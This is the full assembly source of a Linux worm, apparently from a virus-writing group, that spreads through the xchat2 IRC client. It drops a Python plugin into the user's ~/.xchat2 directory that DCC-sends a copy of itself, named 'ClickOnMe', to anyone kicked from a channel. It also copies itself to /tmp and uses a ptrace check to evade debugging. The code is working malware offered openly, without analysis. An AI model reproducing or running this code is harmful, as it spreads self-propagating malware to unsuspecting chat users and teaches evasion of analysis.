; This is the first worm that uses the xchat program to spread.
; It works as following:
; 1) chdir() to HOME directory
; 2) chdir() to .xchat2 directory, it exists if the dir doesn't exist
; 3) Drop the xchat2worm.py script
; 4) Drop the worm in /tmp
; coded by [WarGame/doomriderz]
; P.S: If you invoke it as ./xchat2worm it will not work properly coz of "./"
; but a normal user will simply click on it (so argv[0] -> /somepath/xchat2worm)
; Thx go to SlageHammer and emp_ for their help with stack :)
BITS 32
global main
extern getenv ; hehe from libc :)
extern system
extern sprintf
section .data
;;; the python irc script ;;;
python_irc:
db '__module_name__ = "xchat2worm"',13,10
db '__module_version__ = "0.1"',13,10
db '__module_description__ = "xchat2worm by [WarGame/doomriderz]"',13,10
db 'import xchat',13,10
db 'def onkick_cb(word, word_eol, userdata):',13,10
db ' if xchat.nickcmp(word[3],xchat.get_info("nick")) != 0:',13,10
db ' xchat.command("DCC SEND " + word[3] + " /tmp/ClickOnMe")',13,10
db ' return xchat.EAT_NONE ',13,10
db 'xchat.hook_server("KICK", onkick_cb)',0
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
irc_len equ ($-python_irc)
script_name db "xchat2worm.py",0
home_env db "HOME",0
xchat2_dir db ".xchat2",0
fmt db "cp %s /tmp/ClickOnMe",0
cp_cmd: TIMES 260 db 0
section .text
main:
GetPath:
pop eax
pop ebx
pop ebx
push dword [ebx]
push fmt
push cp_cmd
call sprintf ; this code should build "cp my_path /tmp/drop0"
AntiDebug:
mov eax,26 ; ptrace()
xor ebx,ebx
xor ecx,ecx
xor edx,edx
inc edx
xor esi,esi
int 0x80
test eax,eax
jne near ExiT
GetHome:
push home_env
call getenv
cmp eax,0
je NoDir
GoHome:
xchg ebx,eax
mov eax,12
int 80h
GoXchat2Dir:
mov eax,12
mov ebx,xchat2_dir
int 80h
cmp eax,-1
jne DropPythonScript
NoDir:
mov eax,1
mov ebx,0
int 80h
DropPythonScript:
mov eax,8
mov ebx,script_name
mov ecx,00644Q
int 80h
xchg ebx,eax
mov eax,4
mov ecx,python_irc
mov edx,irc_len
int 80h
DropWorm:
push cp_cmd
call system
ExiT:
mov eax,1
mov ebx,0
int 80h